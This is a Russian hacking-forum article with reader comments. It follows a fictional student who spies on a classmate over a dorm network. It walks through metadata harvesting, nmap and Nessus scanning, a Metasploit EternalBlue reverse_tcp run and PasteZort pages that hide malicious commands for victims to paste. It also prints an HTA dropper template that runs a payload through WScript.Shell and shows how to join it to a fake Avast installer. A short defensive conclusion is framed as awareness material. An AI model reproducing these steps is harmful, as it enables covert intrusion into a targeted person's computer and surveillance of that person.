• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Реверсная история о локальных похождениях Алексея: девятая симфония об одержимом

Да старт дадим мы новому творению с такой грустной ноты, а дело кроется всё в том, что я воистину разочарован. Загуглив одно с названий своей статьи , мне удалось обнаружить уйму ресурсов, куда псевдотворение моё просочилось. Естественно в большинстве случаев с указанным копирайтингом и ссылочкой на оригинал, что не может не радовать, ибо статья продвигается за счёт других ресурсов, считайте её популяризируют в разных слоях общества. Но монетка, имеющая две стороны , не может падать всегда орлом, как и её ребро не станет главной мастью, есть умники, которые находят намного легче для себя банально скопировать и вставить, написав в конце , что именно они являются авторами и, скорее всего, сгребая с полки какой-то профит... Неприятно однако, да пусть.
Заглавие

Данная статья есть логическим продолжением этого творения.
Улыбочку до ушей натянув, начинаем создание нового эпизода с жизни студента Алексея, сегодня предстоит нам разобрать альтернативные варианты ,если бы не перехват, то бишь посмотрим, какими ещё методами наш главный герой-любовник мог заполучить секреты любимой дамы, не используя перехват и модификацию трафика локальной сети. В этой части будет намного меньше теории и поэтичных отступлений, всё будем разбирать на практических примерах и походу. А делая ещё один шаг по текстовому Бродвею, превращаем ходьбу в нагловатое подобие уверенной походки миллиардера, обрисовывая план на день этот:
  • Классический Дьявол: сбор и анализ, как половина успеха
  • Не верь глазам: используем добычу
  • Способы защиты и выводы
Какое-то подобие дисклеймера

Дальше будут представлены простейшие механизмы проведения атак с предыдущим сбором и подготовкой, вся информация представлена лишь в целях ознакомления и, как уже говорилось не раз моей персоной, моя задача не просто показать, как кого-то «взломать», а дать вам почву для размышлений, стимулировав тем самым критическое мышление, ибо понимая механизм -защитится легче. Это как с пикой римского легионера, которая целенаправленно летит в вашу сторону, а я даю вам информацию о ней: её вес, пробойную силу, скорость и возможную толщину дерева , которая остановит её, привязывая к руке щит, который на процентов девяносто её остановит без увечий вам – лишь подставьте.

Классический Дьявол: сбор и анализ, как половина успеха

Когда-то мной была уронена следующая фраза: «Успешная атака на 50% состоит с качества подготовки и количества собранной информации. Знания об жертве – ключ».

И вот фантазией мы начинаем заново, слегка откатим события прошлой статьи , представив себе, что в момент выбора Алексей нашёл для себя достаточно трудным и долгим организовать перехват пакетов от устройства любимой, как истинного любовника-героя его не покидает желание узнать, занято ли сердце возлюбленной кем-то другим или шансы он имеет.

Ярый социопат и приверженец теорий заговора, наш субъект ищет альтернативные варианты, на ум приходит ему , так как он начитался и насмотрелся различных статей да видео ,организовать сбор информации, дабы после выявить уязвимости и как-то их эксплатировать. Представим такую ситуацию, что Алексейчик насколько стеснительный, что боится даже подойти к той девушке на десяток метров, потому ему не известно ничего , даже модель и марка телефона для него в тайне. Давайте создадим ещё одного персонажа, дабы не именовать жертву просто представителем женского пола, пусть да будет это Елизавета.

Общие черты ситуации те же: одна локальная сеть, одна общага, любовь, страсти и сопутствующая глупость .

Изначально нашему Лехе приходит идея, как можно собрать немного ведомостей, так как у группы имеется отдельная беседа, давайте откинем телеграммы и прочие мессенджеры, в наше ситуации – это обычный чат, где одногруппники между собой комуницируют , обмениваются файлами и прочим.. Как истинному хацкеру , Алексею ведомо, что каждая фотография, файл имеет информацию о самой себе, то бишь следующий перечень: дата создания , геометка, девайс на который был запечатлен тот или иной момент.

Это так называемые метаданные, о них ведомо уже достаточно давно и даже я когда-то писал, потому оставлю чисто цитату с гугла, которая доступно растолкует что да как:

Метаданные — информация о другой информации, или данные, относящиеся к дополнительной информации о содержимом или объекте. Метаданные раскрывают сведения о признаках и свойствах, характеризующих какие-либо сущности, позволяющие автоматически искать и управлять ими в больших информационных потоках.

Дальше Леха находит фотографию , которую скидала девушка в чат, сохраняет её на свой ПК и дальше у него есть лишь два варианта развития событий:

- Самостоятельно просмотреть информацию, используя свойства

- Или воспользоваться каким-то с ресурсов, которые в автоматизированном варианте смогут выдать всё и вся о фотке.

История слегка печальная, ибо файловый хостинг pp-userapi, то есть официальное пристанище картинок ВК, подтирает метаданные, но переманить куда-то в другое место человека – раз плюнуть.

Screenshot_2.png


Алексей решил пойти вторым методом, нашёл специальный сайт, зашёл на него ,выгрузил фотографию и смог узнать геолокацию, марку телефона и расширение экрана. Забив марку телефона в гугл, наш субъект обзавёлся полной информацией об устройстве Елизаветы, но посчитал мобильный не очень перспективным в плане эксплуатации.

Поскольку Елизавета есть активным студентом, которая пытается заполучить красный диплом, на официальном сайте университета она выкладывает различные исследования , работы и так далее, прикрепляя текстовые документы. Леха моментально смекнул к чему дело идёт и сразу же побежал качать программу под названием Foca, исходя с того, что он ленив и ему лень искать что-то самому.

Это программное обеспечение уже использовалось в моих статьях о метаданных, когда мы проводили анализ файлов пентагона, находящихся в открытом доступе. Отсутствуют какие-либо особенности работы приложения: запустил, указал адрес, сохранил и начал поиск.

Screenshot_4.png


После его завершения перед нашими глазами будет полный перечень файлов , которые есть в открытом доступе на сайте, банальным путем перебора Алексей начинает поиск документа, который создавала Елизавета. Найдя его Лёха сможет узреть, допустим, что у жертвы Windows 7 и создавался документ с помощью MW2003. Сейчас вы спросите зачем это всё, если банальным nMAPом или СИ можно было выведать информацию о операционной системе. Но ведь не только ОС может быть уязвимой, программная часть тоже знатно компрометирует, да? А MW2003? Сколько ведь эксплойтов. Долой, затем Алексейка быстро загружается с Кали и начинается жаришка, поехали.

Но у нас всё таки продолжаем сбор информации, ведь Алексей не знает даже Айпи адреса, потому он просматривает список всех подключённых к сети, выполняя cледующую команду в терминале:
Код:
ipdiscover
Снимок экрана_2020-06-26_16-54-33.png


Дабы отфильтровать пользователей мобильных устройств, мы проводим скан сети с помощью nmap, для этого в разделе цель указываем всю сеть. а именно 192.168.1.0\24 , выписываем интересующие нас устройства на win7. Дальше лучше исключить любой физический контакт Елизаветы и Алексея, ибо его не было, а появление Лёхи будет слишком подозрительным. Потому в дело вводим хитрость с бурпсью, которую я рассматривал, как возможный вариант тролинга. То бишь отключаем интернет по очёредности каждому айпи адресу и владелец сам себя выдаст.
Код:
echo 1 > /proc/sys/net/ipv4/ip_forward
ptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Открываем Бурп, переводимся в режим форвардинга и перебрасываем трафик на порт 8080, объяснения этого найдёте в прошлой статье , ссылку оставлю в конце.
«Для начала нам нужно добавить нового слушателя с айпи адресом нашей машины. Для сего дела двигаем в раздел «Proxy» - “Options” – “Add”. Здесь выбираем наш айпи и порт , через который поставлен проброс – 8080. После в этой же менюшке стоит перейти во вкладочку «Request , забыл продолжение» и ставим галочку на против «Support invisible proxy».

Затем стоит перейти в графу «intercept” и отключить его, не отключение чревато отсутствием подключения у жертвы, что вовсе может рассматриваться, как вариант тролинга. Человек подключился, а конекта нет.»
Снимок экрана_2020-06-17_19-09-03.png


А вот мы и узнали какой адрес закреплен роутером за Елизаветой, потому смело действуем дальше. Исходя с того, что Лёха не суперпромега хакерман и не знает какой открытый порт за какую уязвимость может выступать, то он быстро переходит в Nessus, мгновеннопройдя активацию и установку, Алексей создаёт новый скан с адресом Лизы и запускает его. Для этого переходим в раздел «Scan» - “New scan” – “ Advensing Scan”.

После Лёха указывает имя сканируемого проекта и в пункте «Target» прописывает айпи своей возлюбленной и начинает сканирование, прежде сохранив и запустив его.
После мы увидим графический интерфейс, где будут указаны в виде диаграммы все уязвимости, красным отмечаются критические, кликнув на них мы можем лицезреть картину с полным описанием и кодом.
Дань собрана ...

Не верь глазам: используем добычу

Пробив критическую ошибку Алексей обнаруживает, что это какой-то Энтернал блю, как его можно эксплатировать он знает, потому быстро открывает метасплоит и выполняет следующие действия(оставляю цитатой, ибо уже когда-то писал):
“Об истории этого легендарного эксплоита можно говорить сутками напролёт, но всё-же ограничимся краткой историей. Википедия гласит: EternalBlue (CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года, а также при распространении Petya в июне 2017 года.»
Затем Алексей выполняет команды(выбирает пейлоад, эксплоит, атакующего и атакуемого:
Код:
use exploit/windows/smb/ms17_010
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.1
set rhost 192.168.43.211
run
blue.jpeg


Но после видит, что эксплоит прошёл успешно, но сессия не была создана, ибо у девушки на ПК установлен антивирус. Пау.. Пролёт.. По аналогии можно использовать все уязвимости, которые будут найдены Нессусом, на метасплоите не останавливаемся , ибо элементарно и информации полно.

А сейчас действительно рассмотрим интересный репозиторий под названием PastZord. Сутью работы данного скрипта является возможность маскировки вредоностного кода под какую-то команду, которую жертва вводит в командную строку(посредством СИ манипуляции), дальше покажу как можно всё максимально красиво обставить с локальной копией какого-то информационного портала, прежде замаскировав ссылку, и интегрировав наш скрытый вредонос в код страницы.

Но всё по порядку, изначально Алексей устанавливает репозиторий, выдаёт зависимость и запускает сам скрипт.
Код:
git clone
cd PastZort
chmod +x Pastz0rd.py
./PastZ0rd.py
Снимок экрана_2020-06-26_16-24-16.png


После следует выбрать операционную систему(Да, это возможно и на линукс, потому бойтесь, ибо в качестве ознакомления я провёл такую штуку с термуксом и своим Кали, получив в итоге сессию). Алексей выбирает виндоус и TCP , так как его любимая ,скрывающая от него что-то, пользуется именно таким конфигом. После стоит указать свой адрес и порт, согласившись с последим пунктом. В итоге, когда мы перейдем по своему айпи в адресной строке браузера, то мы окажемся на страничке, в углу которой можем увидеть наш текст.

Снимок экрана_2020-06-26_16-38-26.png


Для примера это годится да, но Алексея это категорически не устаивает , он переходит на какой-то портал , копирует его командой:
Код:
wget -r –k –l 1 –p –E –nc https://сodeby.net
Снимок экрана_2020-06-26_16-34-03.png


Немного подождав, Лёха быстро переходит в папку ПастЗарп, ищет индекс.html , открывает его и копирует код, затем быстро переходит в папку со скопрированным сайтом, находит такой же файл (Index.html ) и пишет какой-то текст, который бы заманил и заставил как-то скопировать жертву текст в командную строку. Следующим он вставляет сам вредонос, закрывает и сохраняет и всё переносит в папку Зарпа, при переходе по своему адресу мы уже будем направлены на локальную копию сайта. Сокращаем ссылку и кидаем Елизавете под каким-то предлогом, кстати можно создать собственную копию какого-то портала , где люди помогают людям разбираться в ПК, типа нашего Codeby.net, где поместить несколько таких скрытых кодов.

Снимок экрана_2020-06-26_16-47-57.png


В итоге Алексей получает сессию и таки проверяет есть ли кто-то в его любимой.

Вообще планировал и рассмотреть пример с таким кодом и картинкой в хеше, которая при открытии даёт сессию ,но будет на часть номер три..

Попытки замаскировать изображение под полезную нагрузку Powershell

Не хотел это втыкать в статью, но, спустя сутки , решился дописать. Алексею, как изысканному стервецу, пришла в голову мысль гениальная, действительно, а почему бы не замаскировать полезную нагрузку, которая откроет сессию в последствии под какое-то изображение. Лёха быстро анализирует все возможные скрипты для создания уже компилированного и криптованного варианта, но таких не имеется.

Единственным представителем подобного рода есть репозиторий Empire, если смотреть на то, что Алексей чайник и ему лень создавать слушатель с паувершелл нагрузкой через метасплоит, что тоже имеет место быть, ибо вариант вполне действительный.
Алексей быстро устанавливает его и запускает установку:
Код:
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
Здесь стоит пропустить саму суть этого, ибо у меня возникла уйма проблем с отсутсвием различных модулей, это был целый перечень, постоянно обновляющихся ошибок, профиксив одну - появлялись новые, которые уже не поддавались исправлениям. Рассказывать о их фиксах не вижу смысла, ибо в итоге ничего так и не заработало, не смотря на модифицированный install.sh и ручное добавление реквестов с модулями.

Снимок экрана_2020-06-27_18-34-55.png


Но всё оставим также, ибо мне пришла идея, исходя с того, что мы использовали подобный вредоносный код вчера, а почему бы не использовать его. Ведь оба представителя фактически должны были быть запущены, как исполняемые, к выводу о коде Эмпайр пришёл на основе статей других авторов, ибо если его вставить в командную строку жертвы - лишь сессию лови. Потому Алексей быстро открывает терминал и запускает PasteZort, затем проводит все нужные манипуляции с итоговым запуском метасплоитслушателя, перейдя с другого девайса по адресу своей машины , лицезреть можем какой-то код, да, знакомо нам это.. Копируем ,вставляем в текстовый документ и видим, что помимо текста у нас какой-то набор символов, очистив его от ненужного хлама, переходим к следующему этапу, выбираем какую-то гифку и качаем себе на ПК.

Снимок экрана_2020-06-27_18-42-20.png


Следующим шагом нужно будет использование специального кода, который я оставлю где-то под спойлером, но слегка испорчу его, дабы всякие умники не начали творить вещи плохие. Преобразовываем нашу гифку в Base64, используя специальный ресурс, которых уйма, к слову. Затем в строке Payload в кавычках вставляем наш вредонос, а в графе Base64 - код нашей картинки.

Алексеюшка мгновенно сохраняет текстовый документ, скидывает на флешку и, используя ноутбук своего соседа, криптует код и конвертирует его в формат .HTA. Здесь автора настигло тотальное разочарование, ибо этот формат является уже формально исполнительным , его запросто можно преобразовать в .EXE и ничего не изменится.. Так, простите, в чём тогда суть делать такое, используя ГИФ, эм.. Нонсенс, с таким же самым успехом , можно банально засунуть код в батник и скинуть другу, сказав открыть его, ведь мы получим сессию тоже..

Снимок экрана_2020-06-27_18-44-42.png


Закрою глаза на разочарование своё и, слегка импровизируя , хочу попробовать склеить этот .HTA с каким-нибудь установщиком, к примеру антивируса. Используем простой до глубины души Джойнер с открытого доступа. Хотя можно подделать даже информацию, указав подлинную ,а именно от компании Avast.

Screenshot_5.png


И теперь при открытии установщика у нас открывается и изображение, если заменить его на логотип антивируса, то это будет вполне правдоподобным сценарием и жертва, возможно лишь ,ничего не заподозрит, смотря правде в глаза, намного лучшим вариантом есть использование батника с полезной нагрузкой, ибо это не будет палиться пользователю, но антивирусная программа моментально смекает о чем беседа идёт, на корне присекая попытки установить коннект .

Screenshot_6.png


Защиты банально нет, ибо антивирусные программы абсолютно не реагируют на такого рода файлы, то бишь... На самом деле здесь я слегка в шок повержен, ибо имеем полнейшую дичь, данный способ обрёл популярность ещё два года назад, мне абсолютно не известно почему это ещё не исправлено и не существует патча, закрывающего это дыру.. Это ужас, господа.
1) <html>
2) <head>
3) <title>NazvanieGif</title>
4) <hta:application id="NazvanieGif"
5) border="thin"
6) borderstyle="complex"
7) maximizeButton="no"
8) minimizeButton="no"
9) />
10)
11) </head>
12)
13) <script type="text/javascript">
14)
15) var index = -1;
16) var images = [
17) "data:image/gif;base64,"];
19)
20) function initGallery(){
21) window.resizeTo(300,300);
22) htaPayload();
23) nextPicture();
24) }
26) function nextPicture(){
27) var img;
28) index = index + 1;
29) if (index > images.length -1 ){
30) index = 0;
31) }
32)img=document.getElementById("gallery");
33) img.src = images[index];
34) }
35)
36) function htaPayload(){
37) var payload="";
38) try{
39) if (navigator.userAgent.indexOf("Windows") !== -1){
40) new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);
41) }
42) }
43) catch(e){
44) }
45) }
46)
47) </script>
48)
49) <style>
50)
51) #gallery, div {
52) width: 100%;
53) height: 100%;
54) }
55)
56) #outer {
57) text-align: center;
58) }
59)
60) #inner{
61) display: inline-block;
62) }
63)
64) body {
65) background-colo nea
76) </html>
Выводы

Локальная сеть компрометирует нас уже по всем параметрам. Если в первом варианте с уязвимостями всё ясно, то бишь устанавливайте себе патчи, фиксы и сидите с антивирусом, попутно отключая ненужные службы. Так во втором варианте не помог даже антивирус… Будьте бдительны, господа, всем добра. Удачи.
 
Последнее редактирование:

Mogen

Red Team
27.08.2019
316
614
BIT
29
В локальной сети осторожнее надо быть! Статья крутая.
История Алексея развивается :)
Можно будет потом для сюжета форензику подключить)
 
  • Нравится
Реакции: Knotoni

Mick Dizer

Member
30.03.2019
8
0
BIT
0
Ничо не понял, с какого перепуга в своей "локалке" Лоша ищет роутер своей возлюбленной. Это что такой своеобразный троллиг по сломатию мозга?
 
  • Нравится
Реакции: ALLIGATOR

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
до боли, знакомый код))) Алешка... и не лей на ВТ !!
 
Последнее редактирование:
  • Нравится
Реакции: Ex_Boys
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!